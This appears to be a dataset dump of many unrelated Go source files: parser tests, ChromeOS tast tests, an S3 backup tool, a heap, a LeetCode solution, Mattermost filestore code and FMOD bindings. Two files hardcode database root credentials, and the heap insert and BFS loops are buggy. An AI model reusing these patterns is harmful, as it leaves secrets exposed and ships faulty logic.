text stringlengths 11 4.05M |
|---|
package zh_test
import (
"github.com/olebedev/when"
"github.com/stretchr/testify/require"
"testing"
"time"
)
var now = time.Date(2022, time.March, 14, 0, 0, 0, 0, time.UTC)
type Fixture struct {
Text string
Index int
Phrase string
Diff time.Duration
}
func ApplyFixtures(t *testing.T, name string, w *when.Parser, fixt []Fixture) {
for i, f := range fixt {
res, err := w.Parse(f.Text, now)
require.Nil(t, err, "[%s] err #%d", name, i)
require.NotNil(t, res, "[%s] res #%d", name, i)
require.Equal(t, f.Index, res.Index, "[%s] index #%d", name, i)
require.Equal(t, f.Phrase, res.Text, "[%s] text #%d", name, i)
require.Equal(t, f.Diff, res.Time.Sub(now), "[%s] diff #%d", name, i)
}
}
func ApplyFixturesNil(t *testing.T, name string, w *when.Parser, fixt []Fixture) {
for i, f := range fixt {
res, err := w.Parse(f.Text, now)
require.Nil(t, err, "[%s] err #%d", name, i)
require.Nil(t, res, "[%s] res #%d", name, i)
}
}
|
package controllers
import (
"bytes"
"fmt"
"github.com/UniversityRadioYork/myradio-go"
"github.com/UniversityRadioYork/ury-ical/models"
"github.com/UniversityRadioYork/ury-ical/structs"
"github.com/gorilla/mux"
"github.com/jaytaylor/html2text"
"net/http"
"strconv"
"strings"
"text/template"
)
// ShowController is the controller for the index page.
type ShowController struct {
Controller
}
// NewShowController returns a new ShowController with the MyRadio session s
// and configuration context c.
func NewShowController(s *myradio.Session, c *structs.Config) *ShowController {
return &ShowController{Controller{session: s, config: c}}
}
// Get handles the HTTP GET request r for the index page, writing to w.
func (ic *ShowController) Get(w http.ResponseWriter, r *http.Request) {
im := models.NewShowModel(ic.session)
vars := mux.Vars(r)
id, _ := strconv.Atoi(vars["id"])
show, timeslots, err := im.Get(id)
if err != nil {
http.Error(w, err.Error(), 500)
return
}
cal := ic.config.Calendar
cal.NAME = fmt.Sprintf("%s - %s", cal.NAME, show.Title)
cal.X_WR_CALNAME = cal.NAME
t := template.New("calendar template")
t.Funcs(template.FuncMap{
"html2text": html2text.FromString,
"trim": strings.TrimSpace,
})
t, _ = t.Parse(ic.config.CalendarDescription)
var desc bytes.Buffer
data := structs.CalendarTemplateData{
Show: show,
Config: *ic.config,
}
err = t.Execute(&desc, data)
if err != nil {
http.Error(w, err.Error(), 500)
return
}
cal.DESCRIPTION = desc.String()
cal.X_WR_CALDESC = cal.DESCRIPTION
ic.renderICAL(cal, timeslots, w)
}
|
// Copyright 2022 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package cryptohome
import (
"context"
"fmt"
"os"
"time"
"chromiumos/tast/common/fixture"
"chromiumos/tast/common/hwsec"
"chromiumos/tast/common/policy"
"chromiumos/tast/common/policy/fakedms"
"chromiumos/tast/ctxutil"
"chromiumos/tast/local/bundles/cros/cryptohome/cleanup"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/cryptohome"
"chromiumos/tast/local/disk"
hwseclocal "chromiumos/tast/local/hwsec"
"chromiumos/tast/local/policyutil"
"chromiumos/tast/local/upstart"
"chromiumos/tast/testing"
)
func init() {
testing.AddTest(&testing.Test{
Func: AutomaticCleanupCritical,
LacrosStatus: testing.LacrosVariantUnneeded,
Desc: "Test critical automatic disk cleanup",
Contacts: []string{
"vsavu@google.com", // Test author
"gwendal@chromium.com", // Lead for ChromeOS Storage
},
Attr: []string{"group:mainline", "informational"},
Fixture: fixture.FakeDMSEnrolled,
VarDeps: []string{"ui.signinProfileTestExtensionManifestKey"},
SoftwareDeps: []string{"chrome"},
})
}
func AutomaticCleanupCritical(ctx context.Context, s *testing.State) {
fdms := s.FixtValue().(*fakedms.FakeDMS)
for _, param := range []struct {
name string // name is the subtest name.
policy *policy.DeviceRunAutomaticCleanupOnLogin // policy is the policy we test.
shouldRun bool // shouldRun indicates whether the cleanup should run.
}{
{
name: "unset",
policy: &policy.DeviceRunAutomaticCleanupOnLogin{Stat: policy.StatusUnset},
shouldRun: true,
},
{
name: "false",
policy: &policy.DeviceRunAutomaticCleanupOnLogin{Val: false},
shouldRun: false,
},
{
name: "true",
policy: &policy.DeviceRunAutomaticCleanupOnLogin{Val: true},
shouldRun: true,
},
} {
s.Run(ctx, param.name, func(ctx context.Context, s *testing.State) {
// Start a Chrome instance that will fetch policies from the FakeDMS.
cr, err := chrome.New(ctx,
chrome.NoLogin(),
chrome.DMSPolicy(fdms.URL),
chrome.KeepEnrollment(),
chrome.LoadSigninProfileExtension(s.RequiredVar("ui.signinProfileTestExtensionManifestKey")),
)
if err != nil {
s.Fatal("Chrome start failed: ", err)
}
defer cr.Close(ctx)
tconn, err := cr.SigninProfileTestAPIConn(ctx)
if err != nil {
s.Fatal("Failed to open tconn: ", err)
}
// Update policies.
pb := policy.NewBlob()
pb.AddPolicies([]policy.Policy{param.policy})
if err := fdms.WritePolicyBlob(pb); err != nil {
s.Fatal("Failed to write policies: ", err)
}
if err := policyutil.Refresh(ctx, tconn); err != nil {
s.Fatal("Failed to update policies: ", err)
}
if err := policyutil.Verify(ctx, tconn, []policy.Policy{param.policy}); err != nil {
s.Fatal("Failed to verify policies: ", err)
}
const (
homedirSize = 100 * cleanup.MiB // 100 Mib, used for testing
temporaryUser = "tmp-user"
user1 = "critical-cleanup-user1"
user2 = "critical-cleanup-user2"
password = "1234"
)
cmdRunner := hwseclocal.NewCmdRunner()
helper, err := hwseclocal.NewHelper(cmdRunner)
if err != nil {
s.Fatal("Failed to create hwsec local helper: ", err)
}
daemonController := helper.DaemonController()
// Start cryptohomed and wait for it to be available.
if err := daemonController.Ensure(ctx, hwsec.CryptohomeDaemon); err != nil {
s.Fatal("Failed to start cryptohomed: ", err)
}
defer daemonController.Restart(ctx, hwsec.CryptohomeDaemon)
ctx, cancel := ctxutil.Shorten(ctx, 10*time.Second)
defer cancel()
freeSpace, err := disk.FreeSpace(cleanup.UserHome)
if err != nil {
s.Fatal("Failed to get the amount of free space")
}
cleanupThreshold := freeSpace + 50*1024*1024
cleanupThresholdsArgs := fmt.Sprintf("--cleanup_threshold=%d --aggressive_cleanup_threshold=%d --critical_cleanup_threshold=%d --target_free_space=%d", cleanupThreshold, cleanupThreshold, cleanupThreshold, cleanupThreshold)
// Restart with higher thresholds. Restart also needed to make sure policies are applied.
if err := upstart.RestartJob(ctx, "cryptohomed", upstart.WithArg("VMODULE_ARG", "*=1"), upstart.WithArg("CRYPTOHOMED_ARGS", cleanupThresholdsArgs)); err != nil {
s.Fatal("Failed to restart cryptohome: ", err)
}
if err := cleanup.RunOnExistingUsers(ctx); err != nil {
s.Fatal("Failed to perform initial cleanup: ", err)
}
// Create users with contents to fill up disk space.
_, err = cleanup.CreateFilledUserHomedir(ctx, user1, password, "Downloads", homedirSize)
if err != nil {
s.Fatal("Failed to create user with content: ", err)
}
defer cryptohome.RemoveVault(ctx, user1)
fillFile2, err := cleanup.CreateFilledUserHomedir(ctx, user2, password, "Downloads", homedirSize)
if err != nil {
s.Fatal("Failed to create user with content: ", err)
}
defer cryptohome.RemoveVault(ctx, user2)
// Unmount all users before removal.
defer cryptohome.UnmountAll(ctx)
// Make sure to unmount the second user.
if err := cryptohome.UnmountVault(ctx, user2); err != nil {
s.Fatal("Failed to unmount user vault: ", err)
}
// Remount the second user. Since space is very low, other user should be cleaned up.
if err := cryptohome.CreateVault(ctx, user2, password); err != nil {
s.Fatal("Failed to remount user vault: ", err)
}
if err := cryptohome.WaitForUserMount(ctx, user2); err != nil {
s.Fatal("Failed to remount user vault: ", err)
}
// Check if the users are correctly present.
if _, err := os.Stat(fillFile2); err != nil {
s.Error("Data for user2 lost: ", err)
}
shouldExist := !param.shouldRun
if exists, err := cleanup.UserHomeExists(ctx, user1); err != nil {
s.Fatal("Failed to dermine if user vault exists: ", err)
} else if exists != shouldExist {
s.Errorf("User vault unexpectedly exists: got %t; want %t", exists, shouldExist)
}
})
}
}
|
package main
import (
"fmt"
"log"
"os"
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/s3"
"github.com/aws/aws-sdk-go/service/s3/s3manager"
)
var (
configPath string
backupName string
bucket string
prefix string
)
func init() {
if len(os.Args) != 4 {
log.Fatalln("Usage:", os.Args[0], "<config path> <backup name> <bucket>")
}
configPath = os.Args[1]
backupName = os.Args[2]
bucket = os.Args[3]
prefix = "database"
}
func main() {
mysql := &MySQL{
ConfigFile: configPath,
Name: backupName,
}
fmt.Print("==> Starting MySQL Dump...")
dump := mysql.Dump()
if dump.Error != nil {
log.Println("There's an error!")
panic(dump.Error)
}
fmt.Println("Done!")
fmt.Printf("==> Uploading %v to S3 Bucket: %v", dump.Path, bucket)
file, err := os.Open(dump.Path)
if err != nil {
log.Fatal("Open failed:", err)
}
defer file.Close()
sess := session.New(&aws.Config{Region: aws.String("us-east-1")})
uploader := s3manager.NewUploader(sess)
uploadRes, err := uploader.Upload(&s3manager.UploadInput{
Bucket: aws.String(bucket),
Key: aws.String(file.Name()),
Body: file,
})
log.Print(uploadRes.Location)
os.Remove(dump.Path)
if err != nil {
log.Fatalln("Upload failed:", err)
}
svc := s3.New(sess)
req, _ := svc.GetObjectRequest(&s3.GetObjectInput{
Bucket: aws.String(bucket),
Key: aws.String(file.Name()),
})
// Presign a request with 1 hour expiration.
url, err := req.Presign(60 * time.Minute)
if err != nil {
log.Fatal("Unable to get Presigned URL:", err)
}
fmt.Println(url)
}
|
package main
import "fmt"
// why not just type heap []int ?
type heap struct {
data []int
}
// insert adds element e to the heap
func (h *heap) insert(e int) {
if cap(h.data) == len(h.data) {
data := make([]int, cap(h.data)*2)[0:len(h.data)]
copy(data, h.data)
h.data = data
}
h.data = h.data[0:len(h.data)+1]
h.data[len(h.data)-1] = e
this := len(h.data)-1
for this > 0 && h.data[this] < h.data[up(this)] {
h.data[this], h.data[up(this)] = h.data[up(this)], h.data[this]
}
}
// pop returns the top element from the heap
func (h *heap) pop() int {
val := h.data[0]
h.data[0] = h.data[len(h.data)-1]
h.data = h.data[0:len(h.data)-1]
// if > 1 element left, maintain heap invariant
if len(h.data) > 1 {
this := 0
min := -1
for this != min {
min = this
if left(this) < len(h.data) && h.data[left(this)] < h.data[min] {
min = left(this)
}
if right(this) < len(h.data) && h.data[right(this)] < h.data[min] {
min = right(this)
}
h.data[min], h.data[this] = h.data[this], h.data[min]
}
}
return val
}
// create takes the given slice and creates a heap type that uses the slice for storage
func create(s []int) *heap {
h := new(heap)
// could use ceil(log_2(len(s))) or something as size
h.data = make([]int, len(s))[0:0]
for _,v := range(s) {
h.insert(v)
}
return h
}
func up(i int) int { return (i-1)/2 }
func left(i int) int { return i*2+1 }
func right(i int) int { return i*2+2 }
func main() {
h := create([]int{99,5,2,3,11,9,21834})
h.insert(33)
fmt.Println(h)
// try heap sorting
for i := 0; i < 8; i++ {
fmt.Println(h.pop())
}
fmt.Println(h)
}
|
package input
import (
"encoding/json"
)
type EKS struct {
AWSRegion string `json:"aws_region"`
AWSAccessKey string `json:"aws_access_key"`
AWSSecretKey string `json:"aws_secret_key"`
ClusterName string `json:"cluster_name"`
}
func (eks *EKS) GetInput() ([]byte, error) {
return json.Marshal(eks)
}
func GetEKSInput(bytes []byte) (*EKS, error) {
res := &EKS{}
err := json.Unmarshal(bytes, res)
return res, err
}
|
package leetcode_0635_设计日志存储系统
/*
你将获得多条日志,每条日志都有唯一的 id 和 timestamp,timestamp 是形如 Year:Month:Day:Hour:Minute:Second 的字符串
例如 2017:01:01:23:59:59,所有值域都是零填充的十进制数。
设计一个日志存储系统实现如下功能:
void Put(int id, string timestamp):
给定日志的 id 和 timestamp,将这个日志存入你的存储系统中。
int[] Retrieve(String start, String end, String granularity):
返回在给定时间区间内的所有日志的 id。start 、 end 和 timestamp 的格式相同,granularity 表示考虑的时间级。
比如,start = "2017:01:01:23:59:59", end = "2017:01:02:23:59:59", granularity = "Day" 代表区间 2017 年 1 月 1 日到 2017 年 1 月 2 日。
样例 1 :
put(1, "2017:01:01:23:59:59");
put(2, "2017:01:01:22:59:59");
put(3, "2016:01:01:00:00:00");
retrieve("2016:01:01:01:01:01","2017:01:01:23:00:00","Year"); // 返回值 [1,2,3],返回从 2016 年到 2017 年所有的日志。
retrieve("2016:01:01:01:01:01","2017:01:01:23:00:00","Hour"); // 返回值 [1,2], 返回从 2016:01:01:01 到 2017:01:01:23 区间内的日志,日志 3 不在区间内。
注释 :
Put 和 Retrieve 的指令总数不超过 300。
年份的区间是 [2000,2017],小时的区间是 [00,23]。
Retrieve 的输出顺序不作要求。
*/
type LogSystem struct {
ids []int
ts []string
}
func Constructor() LogSystem {
return LogSystem{[]int{}, []string{}}
}
func (this *LogSystem) Put(id int, timestamp string) {
this.ids = append(this.ids, id)
this.ts = append(this.ts, timestamp)
}
// 时间级 <---> 在字符串中的范围
var keyMap = map[string]int{
"Year": 4, // [0:4]
"Month": 7, // [0:7]
"Day": 10, // [0:10]
"Hour": 13, // [0:13]
"Minute": 16, // [0:16]
"Second": 19, // [0:19]
}
/*
此解法完全利用到了字符串大小的比较,忽略了时间转换等复杂操作,着实秀
*/
func (this *LogSystem) Retrieve(s string, e string, gra string) []int {
var res []int
// 通过HashMap找到对应的范围
j := keyMap[gra]
for i, id := range this.ids {
// 比较的时间范围
time := this.ts[i][:j]
// 直接字符串比较大小,等同于时间
// 大于等于起始时间,小于等于结束时间,符合,加入id
if time >= s[:j] && time <= e[:j] {
res = append(res, id)
}
}
return res
}
/**
* Your LogSystem object will be instantiated and called as such:
* obj := Constructor();
* obj.Put(id,timestamp);
* param_2 := obj.Retrieve(s,e,gra);
*/
|
package common
import (
"github.com/globalsign/mgo"
"log"
"time"
)
type AppBus struct {
MongoDbSession *mgo.Session
}
var (
appBus *AppBus
)
func GetAppBus() *AppBus {
if appBus != nil {
return appBus
} else {
dialInfo := mgo.DialInfo{
Addrs: []string{"127.0.0.1"},
Direct: false,
Timeout: time.Second * 1,
Database: "ip_pool",
Source: "admin",
Username: "root",
Password: "315215241",
PoolLimit: 4096, // Session.SetPoolLimit
}
session, err := mgo.DialWithInfo(&dialInfo)
if err != nil {
log.Fatalf("open mongo db fail. error: %v", err.Error())
}
return &AppBus{
MongoDbSession: session,
}
}
}
|
package infra
import "database/sql"
type SqlHandler struct {
Conn *sql.DB
}
func NewSqlHandler() *SqlHandler {
conn, err := sql.Open("mysql", "root:password@tcp(localhost:3306)/dict")
if err != nil {
panic(err.Error)
}
sqlHandler := new(SqlHandler)
sqlHandler.Conn = conn
return sqlHandler
}
|
// Copyright 2022 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package apps
import (
"context"
"time"
"github.com/golang/protobuf/ptypes/empty"
"google.golang.org/grpc"
"chromiumos/tast/errors"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/chrome/ash"
"chromiumos/tast/local/common"
pb "chromiumos/tast/services/cros/apps"
"chromiumos/tast/testing"
)
const defaultAppLaunchTimeout = 60
func init() {
var svc service
testing.AddService(&testing.Service{
Register: func(srv *grpc.Server, s *testing.ServiceState) {
svc = service{sharedObject: common.SharedObjectsForServiceSingleton}
pb.RegisterAppsServiceServer(srv, &svc)
},
GuaranteeCompatibility: true,
})
}
// Service implements tast.cros.apps.AppsService.
type service struct {
sharedObject *common.SharedObjectsForService
}
// LaunchApp launches an app.
func (svc *service) LaunchApp(ctx context.Context, req *pb.LaunchAppRequest) (*empty.Empty, error) {
if req.TimeoutSecs == 0 {
req.TimeoutSecs = defaultAppLaunchTimeout
}
return common.UseTconn(ctx, svc.sharedObject, func(tconn *chrome.TestConn) (*empty.Empty, error) {
appID, err := getInstalledAppID(ctx, tconn, func(app *ash.ChromeApp) bool {
return app.Name == req.AppName
}, &testing.PollOptions{Timeout: time.Duration(req.TimeoutSecs) * time.Second})
if err != nil {
return nil, err
}
if err := tconn.Call(ctx, nil, `tast.promisify(chrome.autotestPrivate.launchApp)`, appID); err != nil {
return nil, errors.Wrapf(err, "failed to launch app %s", req.AppName)
}
if err := ash.WaitForApp(ctx, tconn, appID, time.Duration(req.TimeoutSecs)*time.Second); err != nil {
return nil, errors.Wrapf(err, "app %s never opened", req.AppName)
}
return &empty.Empty{}, nil
})
}
// GetPrimaryBrowser returns the App used for the primary browser.
func (svc *service) GetPrimaryBrowser(ctx context.Context, req *empty.Empty) (*pb.App, error) {
return common.UseTconn(ctx, svc.sharedObject, func(tconn *chrome.TestConn) (*pb.App, error) {
app, err := PrimaryBrowser(ctx, tconn)
if err != nil {
return nil, err
}
return &pb.App{Id: app.ID, Name: app.Name}, nil
})
}
// LaunchPrimaryBrowser launches the primary browser and returns the App launched.
func (svc *service) LaunchPrimaryBrowser(ctx context.Context, req *empty.Empty) (*pb.App, error) {
app, err := svc.GetPrimaryBrowser(ctx, req)
if err != nil {
return app, err
}
_, err = svc.LaunchApp(ctx, &pb.LaunchAppRequest{AppName: app.Name})
return app, err
}
|
package graphs
import "../core"
func (d *DirectedNode) BreadthFirstSearch() []int {
q := new(core.Queue)
q.Enqueue(d)
var visited []*DirectedNode
for n, _ := q.Dequeue(); q.Size() != 0; n, _ = q.Dequeue() {
curr := n.(*DirectedNode)
for _, neighbor := range curr.neighbors {
if !(sliceContains(visited, neighbor) || q.Contains(neighbor, compareNode)) {
q.Enqueue(neighbor)
}
}
visited = append(visited, curr)
}
// extract the actual values
var out []int
for _, n := range visited {
out = append(out, n.value)
}
return out
}
|
// Copyright (c) 2015-present Mattermost, Inc. All Rights Reserved.
// See LICENSE.txt for license information.
//
package aws
import (
"fmt"
"github.com/aws/aws-sdk-go-v2/aws/arn"
"github.com/mattermost/mattermost-cloud/model"
"github.com/pkg/errors"
log "github.com/sirupsen/logrus"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
// S3MultitenantFilestore is a filestore backed by a shared AWS S3 bucket.
type S3MultitenantFilestore struct {
installationID string
awsClient *Client
}
// NewS3MultitenantFilestore returns a new NewS3MultitenantFilestore interface.
func NewS3MultitenantFilestore(installationID string, awsClient *Client) *S3MultitenantFilestore {
return &S3MultitenantFilestore{
installationID: installationID,
awsClient: awsClient,
}
}
// Provision completes all the steps necessary to provision an S3 multitenant
// filestore.
func (f *S3MultitenantFilestore) Provision(store model.InstallationDatabaseStoreInterface, logger log.FieldLogger) error {
err := f.s3FilestoreProvision(store, logger)
if err != nil {
return errors.Wrap(err, "failed to provision AWS multitenant S3 filestore")
}
return nil
}
// Teardown removes all AWS resources related to a shared S3 filestore.
func (f *S3MultitenantFilestore) Teardown(keepData bool, store model.InstallationDatabaseStoreInterface, logger log.FieldLogger) error {
awsID := CloudID(f.installationID)
logger = logger.WithFields(log.Fields{
"awsID": awsID,
"filestore-type": "s3-multitenant",
})
logger.Info("Tearing down AWS S3 filestore")
bucketName, err := f.awsClient.GetMultitenantBucketNameForInstallation(f.installationID, store)
if err != nil {
// Perform a manual check to see if no cluster installations were ever
// created for this installation.
clusterInstallations, ciErr := store.GetClusterInstallations(&model.ClusterInstallationFilter{
Paging: model.AllPagesWithDeleted(),
InstallationID: f.installationID,
})
if ciErr != nil {
return errors.Wrap(ciErr, "failed to query cluster installations")
}
if len(clusterInstallations) == 0 {
logger.Warn("No cluster installations found for installation; assuming multitenant filestore was never created")
return nil
}
return errors.Wrap(err, "failed to find multitenant bucket")
}
logger = logger.WithField("s3-bucket-name", bucketName)
err = f.awsClient.iamEnsureUserDeleted(awsID, logger)
if err != nil {
return errors.Wrap(err, "failed to delete AWS IAM user")
}
err = f.awsClient.secretsManagerEnsureIAMAccessKeySecretDeleted(awsID, logger)
if err != nil {
return errors.Wrap(err, "failed to delete IAM access key secret")
}
if keepData {
logger.Info("AWS S3 bucket was left intact due to the keep-data setting of this server")
return nil
}
err = f.awsClient.S3EnsureBucketDirectoryDeleted(bucketName, f.installationID, logger)
if err != nil {
return errors.Wrap(err, "unable to ensure that AWS S3 filestore was deleted")
}
logger.Debug("AWS multitenant S3 filestore was deleted")
return nil
}
// GenerateFilestoreSpecAndSecret creates the k8s filestore spec and secret for
// accessing the shared S3 bucket.
func (f *S3MultitenantFilestore) GenerateFilestoreSpecAndSecret(store model.InstallationDatabaseStoreInterface, logger log.FieldLogger) (*model.FilestoreConfig, *corev1.Secret, error) {
awsID := CloudID(f.installationID)
logger = logger.WithFields(log.Fields{
"awsID": awsID,
"filestore-type": "s3-multitenant",
})
logger.Debug("Generating S3 multitenant filestore information")
bucketName, err := f.awsClient.GetMultitenantBucketNameForInstallation(f.installationID, store)
if err != nil {
return nil, nil, errors.Wrap(err, "failed to find multitenant bucket")
}
logger = logger.WithField("s3-bucket-name", bucketName)
iamAccessKey, err := f.awsClient.secretsManagerGetIAMAccessKey(awsID)
if err != nil {
return nil, nil, err
}
filestoreSecretName := fmt.Sprintf("%s-iam-access-key", f.installationID)
filestoreSecret := &corev1.Secret{
ObjectMeta: metav1.ObjectMeta{
Name: filestoreSecretName,
},
StringData: map[string]string{
"accesskey": iamAccessKey.ID,
"secretkey": iamAccessKey.Secret,
},
}
S3RegionURL := f.awsClient.GetS3RegionURL()
filestoreConfig := &model.FilestoreConfig{
URL: S3RegionURL,
Bucket: bucketName,
Secret: filestoreSecretName,
}
logger.Debug("AWS multitenant S3 filestore configuration generated for cluster installation")
return filestoreConfig, filestoreSecret, nil
}
// s3FilestoreProvision provisions a shared S3 filestore for an installation.
func (f *S3MultitenantFilestore) s3FilestoreProvision(store model.InstallationDatabaseStoreInterface, logger log.FieldLogger) error {
awsID := CloudID(f.installationID)
logger = logger.WithFields(log.Fields{
"awsID": awsID,
"filestore-type": "s3-multitenant",
})
logger.Info("Provisioning AWS multitenant S3 filestore")
bucketName, err := f.awsClient.GetMultitenantBucketNameForInstallation(f.installationID, store)
if err != nil {
return errors.Wrap(err, "failed to find multitenant bucket")
}
logger = logger.WithField("s3-bucket-name", bucketName)
user, err := f.awsClient.iamEnsureUserCreated(awsID, logger)
if err != nil {
return err
}
// The IAM policy lookup requires the AWS account ID for the ARN. The user
// object contains this ID so we will user that.
arn, err := arn.Parse(*user.Arn)
if err != nil {
return err
}
policyARN := fmt.Sprintf("arn:aws:iam::%s:policy/%s", arn.AccountID, awsID)
policy, err := f.awsClient.iamEnsureS3PolicyCreated(awsID, policyARN, bucketName, f.installationID, logger)
if err != nil {
return err
}
err = f.awsClient.iamEnsurePolicyAttached(awsID, policyARN, logger)
if err != nil {
return err
}
logger.WithFields(log.Fields{
"iam-policy-name": *policy.PolicyName,
"iam-user-name": *user.UserName,
}).Debug("AWS IAM policy attached to user")
ak, err := f.awsClient.iamEnsureAccessKeyCreated(awsID, logger)
if err != nil {
return err
}
logger.WithField("iam-user-name", *user.UserName).Debug("AWS IAM user access key created")
err = f.awsClient.secretsManagerEnsureIAMAccessKeySecretCreated(awsID, ak, logger)
if err != nil {
return err
}
logger.WithField("iam-user-name", *user.UserName).Debug("AWS secrets manager secret created")
return nil
}
|
package handlers
import (
"encoding/json"
"fmt"
"net/http"
)
// will write the provided http status code and value to the provided
// response writer. Intended for use with values meant to be encoded
// as a JSON in an http response.
func respond(w http.ResponseWriter, statusCode int, value interface{}) {
w.Header().Add(headerContentType, contentTypeJSON)
w.WriteHeader(statusCode)
if err := json.NewEncoder(w).Encode(value); err != nil {
http.Error(w, fmt.Sprintf("Error converting response value to JSON: %v", err), http.StatusInternalServerError)
return
}
}
|
package main
import "fmt"
// args get passed by value
func zeroval(ival int) {
ival = 0
}
// args get passed by reference
func zeroptr(iptr *int) {
// set value of dereferenced pointer
*iptr = 0
}
func main() {
i := 1
fmt.Println("initial:", i)
zeroval(i)
fmt.Println("zeroval:", i)
// pass in the memory address of (pointer to) `i`
zeroptr(&i)
fmt.Println("zeroptr:", i)
fmt.Println("it's still zero:", i)
fmt.Println("pointer:", &i)
}
|
package main
import "fmt"
type USB interface {
Name() string
Connecter
}
type Connecter interface {
Connect()
}
type PhoneConnecter struct {
name string
}
func (pc PhoneConnecter) Name() string {
return pc.name
}
func (pc PhoneConnecter) Connect() {
fmt.Println("connect:", pc.name)
}
func main() {
var usb USB
usb = PhoneConnecter{name: "name"}
usb.Connect()
Disconnect(usb)
}
func Disconnect(usb interface{}) {
//if pc, ok := usb.(PhoneConnecter); ok {
// fmt.Println("disconnected", pc.name)
// return
//}
//fmt.Println("Unkown decive")
switch v := usb.(type) {
case PhoneConnecter:
fmt.Println("disconnect:", v.name)
default:
fmt.Println("unkown decive")
}
}
|
package lowlevel
/*
#include <fmod.h>
*/
import "C"
import "unsafe"
type Geometry struct {
cptr *C.FMOD_GEOMETRY
}
/*
'Geometry' API
*/
func (g *Geometry) Release() error {
res := C.FMOD_Geometry_Release(g.cptr)
return errs[res]
}
/*
Polygon manipulation.
*/
func (g *Geometry) AddPolygon(directocclusion, reverbocclusion float64, doublesided bool, numvertices int, vertices Vector, polygonindex int) error {
cvertices := vertices.toC()
cpolygonindex := C.int(polygonindex)
res := C.FMOD_Geometry_AddPolygon(g.cptr, C.float(directocclusion), C.float(reverbocclusion), getBool(doublesided), C.int(numvertices), &cvertices, &cpolygonindex)
return errs[res]
}
func (g *Geometry) NumPolygons() (int, error) {
var numpolygons C.int
res := C.FMOD_Geometry_GetNumPolygons(g.cptr, &numpolygons)
return int(numpolygons), errs[res]
}
func (g *Geometry) MaxPolygons() (int, int, error) {
var maxpolygons, maxvertices C.int
res := C.FMOD_Geometry_GetMaxPolygons(g.cptr, &maxpolygons, &maxvertices)
return int(maxpolygons), int(maxvertices), errs[res]
}
func (g *Geometry) PolygonNumVertices(index int) (int, error) {
var numvertices C.int
res := C.FMOD_Geometry_GetPolygonNumVertices(g.cptr, C.int(index), &numvertices)
return int(numvertices), errs[res]
}
func (g *Geometry) SetPolygonVertex(index, vertexindex int, vertex Vector) error {
cvertex := vertex.toC()
res := C.FMOD_Geometry_SetPolygonVertex(g.cptr, C.int(index), C.int(vertexindex), &cvertex)
return errs[res]
}
func (g *Geometry) PolygonVertex(index, vertexindex int) (Vector, error) {
var cvertex C.FMOD_VECTOR
var vertex Vector
res := C.FMOD_Geometry_GetPolygonVertex(g.cptr, C.int(index), C.int(vertexindex), &cvertex)
vertex.fromC(cvertex)
return vertex, errs[res]
}
func (g *Geometry) SetPolygonAttributes(index int, directocclusion, reverbocclusion float64, doublesided bool) error {
res := C.FMOD_Geometry_SetPolygonAttributes(g.cptr, C.int(index), C.float(directocclusion), C.float(reverbocclusion), getBool(doublesided))
return errs[res]
}
func (g *Geometry) PolygonAttributes(index int) (float64, float64, bool, error) {
var directocclusion, reverbocclusion C.float
var doublesided C.FMOD_BOOL
res := C.FMOD_Geometry_GetPolygonAttributes(g.cptr, C.int(index), &directocclusion, &reverbocclusion, &doublesided)
return float64(directocclusion), float64(reverbocclusion), setBool(doublesided), errs[res]
}
/*
Object manipulation.
*/
func (g *Geometry) SetActive(active bool) error {
res := C.FMOD_Geometry_SetActive(g.cptr, getBool(active))
return errs[res]
}
func (g *Geometry) IsActive() (bool, error) {
var active C.FMOD_BOOL
res := C.FMOD_Geometry_GetActive(g.cptr, &active)
return setBool(active), errs[res]
}
func (g *Geometry) SetRotation(forward, up Vector) error {
cforward := forward.toC()
cup := up.toC()
res := C.FMOD_Geometry_SetRotation(g.cptr, &cforward, &cup)
return errs[res]
}
func (g *Geometry) Rotation() (Vector, Vector, error) {
var cforward, cup C.FMOD_VECTOR
var forward, up Vector
res := C.FMOD_Geometry_GetRotation(g.cptr, &cforward, &cup)
forward.fromC(cforward)
up.fromC(cup)
return forward, up, errs[res]
}
func (g *Geometry) SetPosition(position Vector) error {
cposition := position.toC()
res := C.FMOD_Geometry_SetPosition(g.cptr, &cposition)
return errs[res]
}
func (g *Geometry) Position() (Vector, error) {
var cposition C.FMOD_VECTOR
var position Vector
res := C.FMOD_Geometry_GetPosition(g.cptr, &cposition)
position.fromC(cposition)
return position, errs[res]
}
func (g *Geometry) SetScale(scale Vector) error {
cscale := scale.toC()
res := C.FMOD_Geometry_SetScale(g.cptr, &cscale)
return errs[res]
}
func (g *Geometry) Scale() (Vector, error) {
var cscale C.FMOD_VECTOR
var scale Vector
res := C.FMOD_Geometry_GetScale(g.cptr, &cscale)
scale.fromC(cscale)
return scale, errs[res]
}
// NOTE: Not implement yet
func (g *Geometry) Save(data *interface{}, datasize *C.int) error {
//FMOD_RESULT F_API FMOD_Geometry_Save(FMOD_GEOMETRY *geometry, void *data, int *datasize);
return ErrNoImpl
}
/*
Userdata set/get.
*/
func (g *Geometry) SetUserData(userdata interface{}) error {
data := *(*[]*C.char)(unsafe.Pointer(&userdata))
res := C.FMOD_Geometry_SetUserData(g.cptr, unsafe.Pointer(&data))
return errs[res]
}
// Retrieves the user value that that was set by calling the "Geometry.SetUserData" function.
func (g *Geometry) UserData() (interface{}, error) {
var userdata *interface{}
cUserdata := unsafe.Pointer(userdata)
res := C.FMOD_Geometry_GetUserData(g.cptr, &cUserdata)
return *(*interface{})(cUserdata), errs[res]
}
|
/*
* aggro
*
* This is a utility for acquiring all the network prefixes announced by a list
* of autonomous systems, aggregating prefixes into less specific ones and
* removing prefixes that are already covered by less specific prefix. The final
* list of prefixes should be the shortest list of prefixes that covers all the
* address ranges advertised by the ASes.
*
* Additionally, prefixes can also be queried by association to a country specified
* by an ISO-3166 alpha-2 country code.
*
* Please see README.md before using this utility.
*
* This is my first Go project - please be gentle. :D This is more or less a
* direct conversion from my node.js script into golang with some added features
* and configurability.
*
* Copyright (c) 2017 Noora Halme - please see LICENSE.md
*/
package main
import (
"flag"
"fmt"
"strconv"
"log"
"regexp"
)
var verbosityLevel int;
var outputFormat string;
var queryType string;
const OUTPUT_QUIET = 0
const OUTPUT_NORMAL = 1
